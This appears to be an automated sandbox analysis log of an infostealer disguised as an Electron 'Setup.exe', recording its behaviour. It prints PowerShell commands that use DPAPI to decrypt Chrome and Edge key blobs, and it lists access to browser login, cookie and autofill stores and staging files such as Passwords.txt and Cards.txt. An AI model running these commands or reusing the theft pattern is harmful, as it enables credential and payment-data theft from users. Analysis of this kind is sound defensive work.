Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser') Jump to behavior
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\resources\app.asar VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\nikki3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\nikki3\cookies.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Passwords.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Autofills.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Cards.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Downloads VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Downloads\AFWAAFRXKO.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\IVHSHTCODI VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\IVHSHTCODI.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\MQAWXUYAIK.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\importantfiles.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\NikkiCookies
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Directory queried: C:\Users\user\Documents